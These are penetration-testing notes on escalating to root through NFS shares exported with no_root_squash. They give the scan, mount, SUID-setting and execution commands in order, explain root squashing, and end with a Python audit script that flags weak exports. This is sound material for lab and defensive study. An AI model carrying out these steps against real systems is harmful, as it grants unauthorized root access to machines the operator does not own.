Exploiting NFS

  • Requirements

    • nfs-common package should be installed

  • Steps

# Nmap scan to find the NFS port; be careful, this scan is NOISY and might take a long time
nmap -T5 -vv -p- IP

# List NFS shares
/sbin/showmount -e IP

# Mount the NFS share (the mount point must exist; nolock is a mount option, so pass it with -o)
mkdir -p /tmp/mount
sudo mount -t nfs IP:share /tmp/mount -o nolock

# Set the SUID bit on the executable file (it runs with its owner's privileges, so the owner must be root)
chmod +s [filename]

# Make sure the file is executable
chmod +x [filename]

# SSH into the target machine and run the executable with -p so the privileges persist and you get a root shell
./[filename] -p

  • What is root_squash?

    • By default, root squashing is enabled on NFS shares; this prevents anyone connecting to the NFS share from having root access to the NFS volume

    • Remote root users are mapped to the user "nfsnobody" when connected, which has the least local privileges

    • If it is turned off (no_root_squash), it allows the creation of SUID-bit files, giving a remote user root access to the connected system

  • What are files with the SUID bit set?

    • The file or files can be run with the permission of the file(s) owner/group, in some cases as the super-user

    • This can be leveraged to get a shell with these super-user privileges

  • Method

    • You can upload files to the NFS share, setting the permissions of the file

    • Then log in through SSH and execute the file to gain a root shell
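To check for the root_squash weakness above from the server side, here is an added example (not from the original notes) that parses exports(5)-style /etc/exports text and flags exports with no_root_squash or open to any client; the sample export lines are constructed, and the parsing rules are an approximation of exports(5).

```python
"""Audit exports(5)-style /etc/exports text for the root_squash weakness.

Assumed format (per exports(5)): <path> <client>(<opt>,...) <client>(...)
'#' starts a comment, root_squash is the default unless no_root_squash is
given, and "host (opts)" with a space before the parenthesis applies the
options to ALL hosts, a classic misconfiguration exports(5) warns about.
"""

# Constructed sample, not taken from any real host.
SAMPLE_EXPORTS = """\
# weak: root on any client keeps uid 0, so SUID files can be planted
/srv/share   *(rw,sync,no_root_squash)
# hardened form: squash root and restrict the client range
/srv/backup  10.0.0.0/24(rw,sync,root_squash)
/srv/public  192.168.1.5(ro,sync)
"""


def parse_exports(text):
    """Yield (path, client, [options]) for every client of every export."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        for client in clients:
            if client.startswith("("):
                client = "*" + client  # "host (opts)": options bind to every host
            if "(" in client and client.endswith(")"):
                host, opts = client[:-1].split("(", 1)
                options = [o for o in opts.split(",") if o]
            else:
                host, options = client, []  # no list: defaults (ro, root_squash)
            yield path, host, options


def audit_exports(text):
    """Return (path, client, issue) findings; an empty list means nothing weak."""
    findings = []
    for path, host, options in parse_exports(text):
        if "no_root_squash" in options:
            findings.append((path, host, "no_root_squash"))
        if host == "*":
            findings.append((path, host, "any_client"))
    return findings


if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{issue:15} {path} exported to {host}")
```

Run it against the real file with `audit_exports(open("/etc/exports").read())`; an empty result means every export squashes root and names its clients.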
